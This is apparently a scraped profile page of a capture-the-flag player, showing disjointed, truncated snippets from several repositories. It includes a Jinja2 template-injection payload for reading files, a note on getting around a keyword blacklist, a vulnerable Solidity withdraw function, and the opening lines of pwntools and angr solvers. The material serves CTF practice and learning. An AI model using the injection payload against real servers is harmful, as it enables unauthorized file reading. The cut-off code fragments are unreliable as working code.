Aaditya Purani aadityapurani

pbcoin

Category: Misc

Author: knapstack

Solves: 1 out of 962 teams

Description: Our team strives to stay up-to-date with latest technologies. Somebody told me that I can secure my code if I apply crypto on it and use blockchain.

Hard_To_Hack (Web 400) - BBCTF2018

Test Condition: {{'7'*7}} Config : {{config}} Request not blocked : {{request}}

After successive tries, figured out class keyword was blacklisted and so did many important keywords. But we can use + to concat two strings and use it.

General file reading payload for Jinja2 is {{ ''.__class__.__mro__[2].__subclasses__()[40]('flag', 'r').read() }}

	import json
	import operator

	'''
	Have to read documentation and see how opUI_DRAW worked
	840501xxxxyyyyff
	opcode text black xcord ycord char
	Communication happens from localhost ethernet -> ev3
	'''

	Nf3
	d4
	Nc3
	Bg5
	e3
	Bxf6
	Bb5+
	O-O
	Ne5
	Bd3

	// Step 1: De-obfuscate `obfuscated.js` and prettify
	// De-obfuscated version
	var _0x3879 = [
	'GfKdJ',
	'pgMYh',
	'fhRJI',
	'pKpLY',
	'JRvAt',
	'igFeE',
	'gIFmj',

	pragma solidity ^0.4.0;

	contract Fundraiser {

	mapping(address => uint) balances;

	function withdrawCoins(){
	uint withdrawAmount = balances[msg.sender];
	PwnWallet wallet = PwnWallet(msg.sender);
	wallet.payout.value(withdrawAmount)();

	{
	"config": {
	"chainId": 15,
	"homesteadBlock": 0,
	"eip155Block": 0,
	"eip158Block": 0
	},
	"nonce": "0x0000000000000033",
	"timestamp": "0x0",
	"parentHash": "0x0000000000000000000000000000000000000000000000000000000000000000",

	from pwn import *

	'''
	Shell-Code https://www.exploit-db.com/exploits/36858/
	'''

	p = process('./pilot')
	#p = remote('pwn.chal.csaw.io', 8464)
	p.recvuntil("Location:")
	buff = int(p.recvline(), 16)

	import angr
	'''
	TokyoWestern CTF rev_rev_rev solved using Angr
	'''
	p = angr.Project("rev_rev_rev")
	ex = p.surveyors.Explorer(find=(0x08048679, ), avoid=(0x0804868B, ))
	ex.run()
	ex.found[0]
	print ex.found[0].state.posix.dumps(0)